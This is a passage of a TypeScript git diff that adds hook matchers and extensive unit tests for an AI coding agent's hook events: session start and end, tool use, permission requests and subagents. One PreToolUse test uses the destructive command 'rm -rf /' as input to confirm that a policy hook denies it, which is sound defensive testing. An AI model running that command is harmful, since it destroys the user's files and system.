this.matchesSessionTrigger(matcher, context.trigger) + : true; + + // Events that don't support matchers: always match + case HookEventName.UserPromptSubmit: + case HookEventName.Stop: + default: + return true; + } + } + + /** + * Match notification type against matcher pattern + */ + private matchesNotificationType( + matcher: string, + notificationType: string, + ): boolean { + return matcher === notificationType; + } + + /** + * Match session source or end reason against matcher pattern + */ + private matchesSessionTrigger(matcher: string, trigger: string): boolean { + try { + // Attempt to treat the matcher as a regular expression. + const regex = new RegExp(matcher); + return regex.test(trigger); + } catch (error) { + // If it's not a valid regex, treat it as a literal string for an exact match. + debugLogger.warn( + `Invalid regex in hook matcher "${matcher}" for session trigger "${trigger}", falling back to exact match: ${error}`, + ); + return matcher === trigger; + } } /** @@ -117,6 +184,22 @@ export class HookPlanner { return matcher === trigger; } + /** + * Match agent type against matcher pattern. + * Supports regex matching, same as tool name matching. 
+ */ + private matchesAgentType(matcher: string, agentType: string): boolean { + try { + const regex = new RegExp(matcher); + return regex.test(agentType); + } catch (error) { + debugLogger.warn( + `Invalid regex in hook matcher "${matcher}" for agent type "${agentType}", falling back to exact match: ${error}`, + ); + return matcher === agentType; + } + } + /** * Deduplicate identical hook configurations */ @@ -143,4 +226,7 @@ export class HookPlanner { export interface HookEventContext { toolName?: string; trigger?: string; + notificationType?: string; + /** Agent type for SubagentStart/SubagentStop matcher filtering */ + agentType?: string; } diff --git a/packages/core/src/hooks/hookRunner.ts b/packages/core/src/hooks/hookRunner.ts index c688e4324..26a09f350 100644 --- a/packages/core/src/hooks/hookRunner.ts +++ b/packages/core/src/hooks/hookRunner.ts @@ -408,12 +408,14 @@ export class HookRunner { // Success - treat as system message or additional context return { decision: 'allow', + reason: 'Hook executed successfully', systemMessage: text, }; } else if (exitCode === EXIT_CODE_NON_BLOCKING_ERROR) { // Non-blocking error (EXIT_CODE_NON_BLOCKING_ERROR = 1) return { decision: 'allow', + reason: `Non-blocking error: ${text}`, systemMessage: `Warning: ${text}`, }; } else { diff --git a/packages/core/src/hooks/hookSystem.test.ts b/packages/core/src/hooks/hookSystem.test.ts index 51f2d3050..b0741a829 100644 --- a/packages/core/src/hooks/hookSystem.test.ts +++ b/packages/core/src/hooks/hookSystem.test.ts @@ -15,9 +15,18 @@ import { HookType, HooksConfigSource, HookEventName, + SessionStartSource, + SessionEndReason, + PermissionMode, + AgentType, type HookDecision, + PreCompactTrigger, + NotificationType, + type PermissionSuggestion, } from './types.js'; import type { Config } from '../config/config.js'; +import type { AggregatedHookResult } from './hookAggregator.js'; +import type { HookOutput } from './types.js'; vi.mock('./hookRegistry.js'); 
vi.mock('./hookRunner.js'); @@ -25,6 +34,17 @@ vi.mock('./hookAggregator.js'); vi.mock('./hookPlanner.js'); vi.mock('./hookEventHandler.js'); +const createMockAggregatedResult = ( + success: boolean = true, + finalOutput?: HookOutput, +): AggregatedHookResult => ({ + success, + allOutputs: [], + errors: [], + totalDuration: 100, + finalOutput, +}); + describe('HookSystem', () => { let mockConfig: Config; let mockHookRegistry: HookRegistry; @@ -63,6 +83,16 @@ describe('HookSystem', () => { mockHookEventHandler = { fireUserPromptSubmitEvent: vi.fn(), fireStopEvent: vi.fn(), + fireSessionStartEvent: vi.fn(), + fireSessionEndEvent: vi.fn(), + firePreToolUseEvent: vi.fn(), + firePostToolUseEvent: vi.fn(), + firePostToolUseFailureEvent: vi.fn(), + firePreCompactEvent: vi.fn(), + fireNotificationEvent: vi.fn(), + firePermissionRequestEvent: vi.fn(), + fireSubagentStartEvent: vi.fn(), + fireSubagentStopEvent: vi.fn(), } as unknown as HookEventHandler; vi.mocked(HookRegistry).mockImplementation(() => mockHookRegistry); @@ -325,4 +355,1237 @@ describe('HookSystem', () => { expect(result?.getAdditionalContext()).toBe('Some additional context'); }); }); + + describe('fireSessionStartEvent', () => { + it('should fire session start event and return output', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 50, + finalOutput: { + continue: true, + decision: 'allow' as HookDecision, + }, + }; + vi.mocked(mockHookEventHandler.fireSessionStartEvent).mockResolvedValue( + mockResult, + ); + + const result = await hookSystem.fireSessionStartEvent( + SessionStartSource.Startup, + 'gpt-4', + ); + + expect(mockHookEventHandler.fireSessionStartEvent).toHaveBeenCalledWith( + SessionStartSource.Startup, + 'gpt-4', + undefined, + undefined, + ); + expect(result).toBeDefined(); + }); + + it('should pass all parameters to event handler', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 0, 
+ finalOutput: { + decision: 'allow' as HookDecision, + }, + }; + vi.mocked(mockHookEventHandler.fireSessionStartEvent).mockResolvedValue( + mockResult, + ); + + await hookSystem.fireSessionStartEvent( + SessionStartSource.Clear, + 'claude-3', + PermissionMode.AutoEdit, // Using actual enum value from PermissionMode + AgentType.Custom, + ); + + expect(mockHookEventHandler.fireSessionStartEvent).toHaveBeenCalledWith( + SessionStartSource.Clear, + 'claude-3', + PermissionMode.AutoEdit, + AgentType.Custom, + ); + }); + + it('should return undefined when no final output', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 0, + finalOutput: undefined, + }; + vi.mocked(mockHookEventHandler.fireSessionStartEvent).mockResolvedValue( + mockResult, + ); + + const result = await hookSystem.fireSessionStartEvent( + SessionStartSource.Startup, + 'gpt-4', + ); + + expect(result).toBeUndefined(); + }); + }); + + describe('fireSessionEndEvent', () => { + it('should fire session end event and return output', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 50, + finalOutput: { + continue: true, + decision: 'allow' as HookDecision, + }, + }; + vi.mocked(mockHookEventHandler.fireSessionEndEvent).mockResolvedValue( + mockResult, + ); + + const result = await hookSystem.fireSessionEndEvent( + SessionEndReason.Other, + ); + + expect(mockHookEventHandler.fireSessionEndEvent).toHaveBeenCalledWith( + SessionEndReason.Other, + ); + expect(result).toBeDefined(); + }); + + it('should pass reason to event handler', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 0, + finalOutput: { + decision: 'allow' as HookDecision, + }, + }; + vi.mocked(mockHookEventHandler.fireSessionEndEvent).mockResolvedValue( + mockResult, + ); + + await hookSystem.fireSessionEndEvent(SessionEndReason.Other); + + 
expect(mockHookEventHandler.fireSessionEndEvent).toHaveBeenCalledWith( + SessionEndReason.Other, + ); + }); + + it('should return undefined when no final output', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 0, + finalOutput: undefined, + }; + vi.mocked(mockHookEventHandler.fireSessionEndEvent).mockResolvedValue( + mockResult, + ); + + const result = await hookSystem.fireSessionEndEvent( + SessionEndReason.Other, + ); + + expect(result).toBeUndefined(); + }); + }); + + describe('firePreToolUseEvent', () => { + it('should fire PreToolUse event and return output', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 50, + finalOutput: { + continue: true, + decision: 'allow' as HookDecision, + }, + }; + vi.mocked(mockHookEventHandler.firePreToolUseEvent).mockResolvedValue( + mockResult, + ); + + const result = await hookSystem.firePreToolUseEvent( + 'bash', + { command: 'ls' }, + 'toolu_test123', + PermissionMode.AutoEdit, + ); + + expect(mockHookEventHandler.firePreToolUseEvent).toHaveBeenCalledWith( + 'bash', + { command: 'ls' }, + 'toolu_test123', + PermissionMode.AutoEdit, + ); + expect(result).toBeDefined(); + }); + + it('should pass all parameters to event handler', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 0, + finalOutput: { + decision: 'allow' as HookDecision, + }, + }; + vi.mocked(mockHookEventHandler.firePreToolUseEvent).mockResolvedValue( + mockResult, + ); + + await hookSystem.firePreToolUseEvent( + 'write_file', + { path: '/test.txt', content: 'test' }, + 'toolu_test456', + PermissionMode.Yolo, + ); + + expect(mockHookEventHandler.firePreToolUseEvent).toHaveBeenCalledWith( + 'write_file', + { path: '/test.txt', content: 'test' }, + 'toolu_test456', + PermissionMode.Yolo, + ); + }); + + it('should return undefined when no final output', async () => { + const mockResult = { + success: true, 
+ allOutputs: [], + errors: [], + totalDuration: 0, + finalOutput: undefined, + }; + vi.mocked(mockHookEventHandler.firePreToolUseEvent).mockResolvedValue( + mockResult, + ); + + const result = await hookSystem.firePreToolUseEvent( + 'bash', + { command: 'ls' }, + 'toolu_test789', + PermissionMode.Default, + ); + + expect(result).toBeUndefined(); + }); + + it('should return DefaultHookOutput with deny decision', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 50, + finalOutput: { + decision: 'deny' as HookDecision, + reason: 'Permission denied by policy', + }, + }; + vi.mocked(mockHookEventHandler.firePreToolUseEvent).mockResolvedValue( + mockResult, + ); + + const result = await hookSystem.firePreToolUseEvent( + 'bash', + { command: 'rm -rf /' }, + 'toolu_test999', + PermissionMode.Default, + ); + + expect(result).toBeDefined(); + expect(result?.isBlockingDecision()).toBe(true); + expect(result?.getEffectiveReason()).toBe('Permission denied by policy'); + }); + + it('should return DefaultHookOutput with additional context', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 50, + finalOutput: { + decision: 'allow' as HookDecision, + hookSpecificOutput: { + additionalContext: 'Tool execution monitored for security', + }, + }, + }; + vi.mocked(mockHookEventHandler.firePreToolUseEvent).mockResolvedValue( + mockResult, + ); + + const result = await hookSystem.firePreToolUseEvent( + 'bash', + { command: 'ls' }, + 'toolu_test111', + PermissionMode.Default, + ); + + expect(result).toBeDefined(); + expect(result?.getAdditionalContext()).toBe( + 'Tool execution monitored for security', + ); + }); + }); + + describe('firePostToolUseEvent', () => { + it('should fire PostToolUse event and return output', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 50, + finalOutput: { + continue: true, + decision: 'allow' as 
HookDecision, + }, + }; + vi.mocked(mockHookEventHandler.firePostToolUseEvent).mockResolvedValue( + mockResult, + ); + + const result = await hookSystem.firePostToolUseEvent( + 'bash', + { command: 'ls' }, + { output: 'file1.txt\nfile2.txt' }, + 'toolu_test123', + PermissionMode.AutoEdit, + ); + + expect(mockHookEventHandler.firePostToolUseEvent).toHaveBeenCalledWith( + 'bash', + { command: 'ls' }, + { output: 'file1.txt\nfile2.txt' }, + 'toolu_test123', + PermissionMode.AutoEdit, + ); + expect(result).toBeDefined(); + }); + + it('should pass all parameters to event handler', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 0, + finalOutput: { + decision: 'allow' as HookDecision, + }, + }; + vi.mocked(mockHookEventHandler.firePostToolUseEvent).mockResolvedValue( + mockResult, + ); + + await hookSystem.firePostToolUseEvent( + 'read_file', + { path: '/test.txt' }, + { content: 'file content' }, + 'toolu_test456', + PermissionMode.Plan, + ); + + expect(mockHookEventHandler.firePostToolUseEvent).toHaveBeenCalledWith( + 'read_file', + { path: '/test.txt' }, + { content: 'file content' }, + 'toolu_test456', + PermissionMode.Plan, + ); + }); + + it('should return undefined when no final output', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 0, + finalOutput: undefined, + }; + vi.mocked(mockHookEventHandler.firePostToolUseEvent).mockResolvedValue( + mockResult, + ); + + const result = await hookSystem.firePostToolUseEvent( + 'bash', + { command: 'ls' }, + { output: 'result' }, + 'toolu_test789', + PermissionMode.Default, + ); + + expect(result).toBeUndefined(); + }); + + it('should return DefaultHookOutput with system message', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 50, + finalOutput: { + decision: 'allow' as HookDecision, + systemMessage: 'Tool executed successfully', + }, + }; + 
vi.mocked(mockHookEventHandler.firePostToolUseEvent).mockResolvedValue( + mockResult, + ); + + const result = await hookSystem.firePostToolUseEvent( + 'bash', + { command: 'ls' }, + { output: 'result' }, + 'toolu_test999', + PermissionMode.Default, + ); + + expect(result).toBeDefined(); + expect(result?.systemMessage).toBe('Tool executed successfully'); + }); + }); + + describe('firePostToolUseFailureEvent', () => { + it('should fire PostToolUseFailure event and return output', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 50, + finalOutput: { + continue: true, + decision: 'allow' as HookDecision, + }, + }; + vi.mocked( + mockHookEventHandler.firePostToolUseFailureEvent, + ).mockResolvedValue(mockResult); + + const result = await hookSystem.firePostToolUseFailureEvent( + 'toolu_test123', + 'bash', + { command: 'invalid' }, + 'Command not found', + false, + PermissionMode.AutoEdit, + ); + + expect( + mockHookEventHandler.firePostToolUseFailureEvent, + ).toHaveBeenCalledWith( + 'toolu_test123', + 'bash', + { command: 'invalid' }, + 'Command not found', + false, + PermissionMode.AutoEdit, + ); + expect(result).toBeDefined(); + }); + + it('should pass all parameters to event handler', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 0, + finalOutput: { + decision: 'allow' as HookDecision, + }, + }; + vi.mocked( + mockHookEventHandler.firePostToolUseFailureEvent, + ).mockResolvedValue(mockResult); + + await hookSystem.firePostToolUseFailureEvent( + 'toolu_test456', + 'write_file', + { path: '/test.txt' }, + 'Permission denied', + true, + PermissionMode.Yolo, + ); + + expect( + mockHookEventHandler.firePostToolUseFailureEvent, + ).toHaveBeenCalledWith( + 'toolu_test456', + 'write_file', + { path: '/test.txt' }, + 'Permission denied', + true, + PermissionMode.Yolo, + ); + }); + + it('should use default values for optional parameters', async () => { + const 
mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 0, + finalOutput: undefined, + }; + vi.mocked( + mockHookEventHandler.firePostToolUseFailureEvent, + ).mockResolvedValue(mockResult); + + await hookSystem.firePostToolUseFailureEvent( + 'toolu_test789', + 'bash', + { command: 'ls' }, + 'Error occurred', + ); + + expect( + mockHookEventHandler.firePostToolUseFailureEvent, + ).toHaveBeenCalledWith( + 'toolu_test789', + 'bash', + { command: 'ls' }, + 'Error occurred', + undefined, + undefined, + ); + }); + + it('should return undefined when no final output', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 0, + finalOutput: undefined, + }; + vi.mocked( + mockHookEventHandler.firePostToolUseFailureEvent, + ).mockResolvedValue(mockResult); + + const result = await hookSystem.firePostToolUseFailureEvent( + 'toolu_test999', + 'bash', + { command: 'ls' }, + 'Error', + ); + + expect(result).toBeUndefined(); + }); + + it('should return DefaultHookOutput with error context', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 50, + finalOutput: { + decision: 'allow' as HookDecision, + hookSpecificOutput: { + additionalContext: 'Failure due to permission issues', + }, + }, + }; + vi.mocked( + mockHookEventHandler.firePostToolUseFailureEvent, + ).mockResolvedValue(mockResult); + + const result = await hookSystem.firePostToolUseFailureEvent( + 'toolu_test111', + 'bash', + { command: 'ls' }, + 'Permission denied', + ); + + expect(result).toBeDefined(); + expect(result?.getAdditionalContext()).toBe( + 'Failure due to permission issues', + ); + }); + }); + + describe('firePreCompactEvent', () => { + it('should fire PreCompact event with auto trigger and return output', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 50, + finalOutput: { + continue: true, + decision: 'allow' as HookDecision, + }, 
+ }; + vi.mocked(mockHookEventHandler.firePreCompactEvent).mockResolvedValue( + mockResult, + ); + + const result = await hookSystem.firePreCompactEvent( + PreCompactTrigger.Auto, + '', + ); + + expect(mockHookEventHandler.firePreCompactEvent).toHaveBeenCalledWith( + PreCompactTrigger.Auto, + '', + ); + expect(result).toBeDefined(); + }); + + it('should fire PreCompact event with manual trigger', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 0, + finalOutput: { + decision: 'allow' as HookDecision, + }, + }; + vi.mocked(mockHookEventHandler.firePreCompactEvent).mockResolvedValue( + mockResult, + ); + + await hookSystem.firePreCompactEvent(PreCompactTrigger.Manual, ''); + + expect(mockHookEventHandler.firePreCompactEvent).toHaveBeenCalledWith( + PreCompactTrigger.Manual, + '', + ); + }); + + it('should pass custom instructions to event handler', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 0, + finalOutput: { + decision: 'allow' as HookDecision, + }, + }; + vi.mocked(mockHookEventHandler.firePreCompactEvent).mockResolvedValue( + mockResult, + ); + + await hookSystem.firePreCompactEvent( + PreCompactTrigger.Auto, + 'Custom compression instructions', + ); + + expect(mockHookEventHandler.firePreCompactEvent).toHaveBeenCalledWith( + PreCompactTrigger.Auto, + 'Custom compression instructions', + ); + }); + + it('should return undefined when no final output', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 0, + finalOutput: undefined, + }; + vi.mocked(mockHookEventHandler.firePreCompactEvent).mockResolvedValue( + mockResult, + ); + + const result = await hookSystem.firePreCompactEvent( + PreCompactTrigger.Auto, + '', + ); + + expect(result).toBeUndefined(); + }); + + it('should return DefaultHookOutput with additional context', async () => { + const mockResult = { + success: true, + allOutputs: [], + 
errors: [], + totalDuration: 50, + finalOutput: { + decision: 'allow' as HookDecision, + hookSpecificOutput: { + additionalContext: 'Context before compression', + }, + }, + }; + vi.mocked(mockHookEventHandler.firePreCompactEvent).mockResolvedValue( + mockResult, + ); + + const result = await hookSystem.firePreCompactEvent( + PreCompactTrigger.Manual, + '', + ); + + expect(result).toBeDefined(); + expect(result?.getAdditionalContext()).toBe('Context before compression'); + }); + }); + + describe('fireNotificationEvent', () => { + it('should fire Notification event and return output', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 50, + finalOutput: { + continue: true, + decision: 'allow' as HookDecision, + }, + }; + vi.mocked(mockHookEventHandler.fireNotificationEvent).mockResolvedValue( + mockResult, + ); + + const result = await hookSystem.fireNotificationEvent( + 'Test notification message', + NotificationType.PermissionPrompt, + 'Permission needed', + ); + + expect(mockHookEventHandler.fireNotificationEvent).toHaveBeenCalledWith( + 'Test notification message', + NotificationType.PermissionPrompt, + 'Permission needed', + ); + expect(result).toBeDefined(); + }); + + it('should pass all parameters to event handler', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 0, + finalOutput: { + decision: 'allow' as HookDecision, + }, + }; + vi.mocked(mockHookEventHandler.fireNotificationEvent).mockResolvedValue( + mockResult, + ); + + await hookSystem.fireNotificationEvent( + 'Qwen Code is waiting for your input', + NotificationType.IdlePrompt, + 'Waiting for input', + ); + + expect(mockHookEventHandler.fireNotificationEvent).toHaveBeenCalledWith( + 'Qwen Code is waiting for your input', + NotificationType.IdlePrompt, + 'Waiting for input', + ); + }); + + it('should handle notification without title', async () => { + const mockResult = { + success: true, + 
allOutputs: [], + errors: [], + totalDuration: 0, + finalOutput: { + decision: 'allow' as HookDecision, + }, + }; + vi.mocked(mockHookEventHandler.fireNotificationEvent).mockResolvedValue( + mockResult, + ); + + await hookSystem.fireNotificationEvent( + 'Authentication successful', + NotificationType.AuthSuccess, + ); + + expect(mockHookEventHandler.fireNotificationEvent).toHaveBeenCalledWith( + 'Authentication successful', + NotificationType.AuthSuccess, + undefined, + ); + }); + + it('should return undefined when no final output', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 0, + finalOutput: undefined, + }; + vi.mocked(mockHookEventHandler.fireNotificationEvent).mockResolvedValue( + mockResult, + ); + + const result = await hookSystem.fireNotificationEvent( + 'Test message', + NotificationType.PermissionPrompt, + ); + + expect(result).toBeUndefined(); + }); + + it('should return DefaultHookOutput with additional context', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 50, + finalOutput: { + decision: 'allow' as HookDecision, + hookSpecificOutput: { + additionalContext: 'Notification handled by custom handler', + }, + }, + }; + vi.mocked(mockHookEventHandler.fireNotificationEvent).mockResolvedValue( + mockResult, + ); + + const result = await hookSystem.fireNotificationEvent( + 'Test notification', + NotificationType.IdlePrompt, + ); + + expect(result).toBeDefined(); + expect(result?.getAdditionalContext()).toBe( + 'Notification handled by custom handler', + ); + }); + + it('should handle elicitation_dialog notification type', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 0, + finalOutput: { + decision: 'allow' as HookDecision, + }, + }; + vi.mocked(mockHookEventHandler.fireNotificationEvent).mockResolvedValue( + mockResult, + ); + + await hookSystem.fireNotificationEvent( + 'Dialog shown to 
user', + NotificationType.ElicitationDialog, + 'Dialog', + ); + + expect(mockHookEventHandler.fireNotificationEvent).toHaveBeenCalledWith( + 'Dialog shown to user', + NotificationType.ElicitationDialog, + 'Dialog', + ); + }); + }); + + describe('firePermissionRequestEvent', () => { + it('should delegate to hookEventHandler.firePermissionRequestEvent', async () => { + const mockFinalOutput = { + hookSpecificOutput: { + decision: { + behavior: 'allow' as const, + }, + }, + }; + const mockAggregated = createMockAggregatedResult(true, mockFinalOutput); + + vi.mocked( + mockHookEventHandler.firePermissionRequestEvent, + ).mockResolvedValue(mockAggregated); + + const result = await hookSystem.firePermissionRequestEvent( + 'Bash', + { command: 'ls -la' }, + PermissionMode.Default, + ); + + expect( + mockHookEventHandler.firePermissionRequestEvent, + ).toHaveBeenCalledWith( + 'Bash', + { command: 'ls -la' }, + PermissionMode.Default, + undefined, + ); + expect(result).toBeDefined(); + // Type assertion needed because getPermissionDecision is specific to PermissionRequestHookOutput + const permissionResult = result as unknown as { + getPermissionDecision: () => { behavior: string } | undefined; + }; + expect(permissionResult.getPermissionDecision()?.behavior).toBe('allow'); + }); + + it('should include permission_suggestions when provided', async () => { + const mockAggregated = createMockAggregatedResult(true); + const suggestions: PermissionSuggestion[] = [ + { type: 'toolAlwaysAllow', tool: 'Bash' }, + ]; + + vi.mocked( + mockHookEventHandler.firePermissionRequestEvent, + ).mockResolvedValue(mockAggregated); + + await hookSystem.firePermissionRequestEvent( + 'Bash', + { command: 'npm test' }, + PermissionMode.Default, + suggestions, + ); + + expect( + mockHookEventHandler.firePermissionRequestEvent, + ).toHaveBeenCalledWith( + 'Bash', + { command: 'npm test' }, + PermissionMode.Default, + suggestions, + ); + }); + + it('should return undefined when hook has no 
finalOutput', async () => { + const mockAggregated = createMockAggregatedResult(false); + + vi.mocked( + mockHookEventHandler.firePermissionRequestEvent, + ).mockResolvedValue(mockAggregated); + + const result = await hookSystem.firePermissionRequestEvent( + 'ReadFile', + { file_path: '/test.txt' }, + PermissionMode.Plan, + ); + + expect(result).toBeUndefined(); + }); + + it('should handle all permission modes correctly', async () => { + const mockAggregated = createMockAggregatedResult(true); + + vi.mocked( + mockHookEventHandler.firePermissionRequestEvent, + ).mockResolvedValue(mockAggregated); + + // Test Default mode + await hookSystem.firePermissionRequestEvent( + 'Bash', + { command: 'test' }, + PermissionMode.Default, + ); + + // Test Plan mode + await hookSystem.firePermissionRequestEvent( + 'Bash', + { command: 'test' }, + PermissionMode.Plan, + ); + + // Test Yolo mode + await hookSystem.firePermissionRequestEvent( + 'Bash', + { command: 'test' }, + PermissionMode.Yolo, + ); + + expect( + mockHookEventHandler.firePermissionRequestEvent, + ).toHaveBeenCalledTimes(3); + }); + + it('should pass through hook errors', async () => { + const mockAggregated = createMockAggregatedResult(false); + mockAggregated.errors = [new Error('PermissionRequest hook error')]; + + vi.mocked( + mockHookEventHandler.firePermissionRequestEvent, + ).mockResolvedValue(mockAggregated); + + const result = await hookSystem.firePermissionRequestEvent( + 'Bash', + { command: 'test' }, + PermissionMode.Default, + ); + + expect(result).toBeUndefined(); + }); + }); + + describe('fireSubagentStartEvent', () => { + it('should fire SubagentStart event and return output', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 50, + finalOutput: { + decision: 'allow' as HookDecision, + }, + }; + vi.mocked(mockHookEventHandler.fireSubagentStartEvent).mockResolvedValue( + mockResult, + ); + + const result = await hookSystem.fireSubagentStartEvent( + 
'agent-123', + 'code-reviewer', + PermissionMode.Default, + ); + + expect(mockHookEventHandler.fireSubagentStartEvent).toHaveBeenCalledWith( + 'agent-123', + 'code-reviewer', + PermissionMode.Default, + ); + expect(result).toBeDefined(); + }); + + it('should pass AgentType enum as agent type', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 0, + finalOutput: { + decision: 'allow' as HookDecision, + }, + }; + vi.mocked(mockHookEventHandler.fireSubagentStartEvent).mockResolvedValue( + mockResult, + ); + + await hookSystem.fireSubagentStartEvent( + 'agent-456', + AgentType.Bash, + PermissionMode.Yolo, + ); + + expect(mockHookEventHandler.fireSubagentStartEvent).toHaveBeenCalledWith( + 'agent-456', + AgentType.Bash, + PermissionMode.Yolo, + ); + }); + + it('should return undefined when no final output', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 0, + finalOutput: undefined, + }; + vi.mocked(mockHookEventHandler.fireSubagentStartEvent).mockResolvedValue( + mockResult, + ); + + const result = await hookSystem.fireSubagentStartEvent( + 'agent-789', + 'test-agent', + PermissionMode.Default, + ); + + expect(result).toBeUndefined(); + }); + + it('should return DefaultHookOutput with additional context', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 50, + finalOutput: { + decision: 'allow' as HookDecision, + hookSpecificOutput: { + additionalContext: 'Extra context injected by SubagentStart hook', + }, + }, + }; + vi.mocked(mockHookEventHandler.fireSubagentStartEvent).mockResolvedValue( + mockResult, + ); + + const result = await hookSystem.fireSubagentStartEvent( + 'agent-111', + 'code-reviewer', + PermissionMode.Default, + ); + + expect(result).toBeDefined(); + expect(result?.getAdditionalContext()).toBe( + 'Extra context injected by SubagentStart hook', + ); + }); + }); + + 
describe('fireSubagentStopEvent', () => { + it('should fire SubagentStop event and return output', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 50, + finalOutput: { + continue: true, + decision: 'allow' as HookDecision, + }, + }; + vi.mocked(mockHookEventHandler.fireSubagentStopEvent).mockResolvedValue( + mockResult, + ); + + const result = await hookSystem.fireSubagentStopEvent( + 'agent-123', + 'code-reviewer', + '/path/to/transcript.jsonl', + 'Final output from subagent', + false, + PermissionMode.Default, + ); + + expect(mockHookEventHandler.fireSubagentStopEvent).toHaveBeenCalledWith( + 'agent-123', + 'code-reviewer', + '/path/to/transcript.jsonl', + 'Final output from subagent', + false, + PermissionMode.Default, + ); + expect(result).toBeDefined(); + }); + + it('should pass all parameters to event handler', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 0, + finalOutput: { + decision: 'allow' as HookDecision, + }, + }; + vi.mocked(mockHookEventHandler.fireSubagentStopEvent).mockResolvedValue( + mockResult, + ); + + await hookSystem.fireSubagentStopEvent( + 'agent-456', + 'qwen-tester', + '/transcript/path.jsonl', + 'last message from agent', + true, + PermissionMode.Plan, + ); + + expect(mockHookEventHandler.fireSubagentStopEvent).toHaveBeenCalledWith( + 'agent-456', + 'qwen-tester', + '/transcript/path.jsonl', + 'last message from agent', + true, + PermissionMode.Plan, + ); + }); + + it('should return undefined when no final output', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 0, + finalOutput: undefined, + }; + vi.mocked(mockHookEventHandler.fireSubagentStopEvent).mockResolvedValue( + mockResult, + ); + + const result = await hookSystem.fireSubagentStopEvent( + 'agent-789', + 'test-agent', + '/path/transcript.jsonl', + 'output', + false, + PermissionMode.Default, + ); + + 
expect(result).toBeUndefined(); + }); + + it('should return StopHookOutput with blocking decision', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 50, + finalOutput: { + decision: 'block' as HookDecision, + reason: 'Output too short, continue working', + }, + }; + vi.mocked(mockHookEventHandler.fireSubagentStopEvent).mockResolvedValue( + mockResult, + ); + + const result = await hookSystem.fireSubagentStopEvent( + 'agent-999', + 'code-reviewer', + '/path/transcript.jsonl', + 'short', + false, + PermissionMode.Default, + ); + + expect(result).toBeDefined(); + expect(result?.isBlockingDecision()).toBe(true); + expect(result?.getEffectiveReason()).toBe( + 'Output too short, continue working', + ); + }); + + it('should return StopHookOutput with allow decision', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 50, + finalOutput: { + decision: 'allow' as HookDecision, + reason: 'Output looks good', + }, + }; + vi.mocked(mockHookEventHandler.fireSubagentStopEvent).mockResolvedValue( + mockResult, + ); + + const result = await hookSystem.fireSubagentStopEvent( + 'agent-222', + 'code-reviewer', + '/path/transcript.jsonl', + 'A comprehensive review of the code...', + false, + PermissionMode.Default, + ); + + expect(result).toBeDefined(); + expect(result?.isBlockingDecision()).toBe(false); + }); + }); }); diff --git a/packages/core/src/hooks/hookSystem.ts b/packages/core/src/hooks/hookSystem.ts index 8a40cbd9e..4716a0c84 100644 --- a/packages/core/src/hooks/hookSystem.ts +++ b/packages/core/src/hooks/hookSystem.ts @@ -14,6 +14,15 @@ import type { HookRegistryEntry } from './hookRegistry.js'; import { createDebugLogger } from '../utils/debugLogger.js'; import type { DefaultHookOutput } from './types.js'; import { createHookOutput } from './types.js'; +import type { + SessionStartSource, + SessionEndReason, + AgentType, + PermissionMode, + PreCompactTrigger, + 
NotificationType, + PermissionSuggestion, +} from './types.js'; const debugLogger = createDebugLogger('TRUSTED_HOOKS'); @@ -100,4 +109,192 @@ export class HookSystem { ? createHookOutput('Stop', result.finalOutput) : undefined; } + + async fireSessionStartEvent( + source: SessionStartSource, + model: string, + permissionMode?: PermissionMode, + agentType?: AgentType, + ): Promise { + const result = await this.hookEventHandler.fireSessionStartEvent( + source, + model, + permissionMode, + agentType, + ); + return result.finalOutput + ? createHookOutput('SessionStart', result.finalOutput) + : undefined; + } + + async fireSessionEndEvent( + reason: SessionEndReason, + ): Promise { + const result = await this.hookEventHandler.fireSessionEndEvent(reason); + return result.finalOutput + ? createHookOutput('SessionEnd', result.finalOutput) + : undefined; + } + + /** + * Fire a PreToolUse event - called before tool execution + */ + async firePreToolUseEvent( + toolName: string, + toolInput: Record, + toolUseId: string, + permissionMode: PermissionMode, + ): Promise { + const result = await this.hookEventHandler.firePreToolUseEvent( + toolName, + 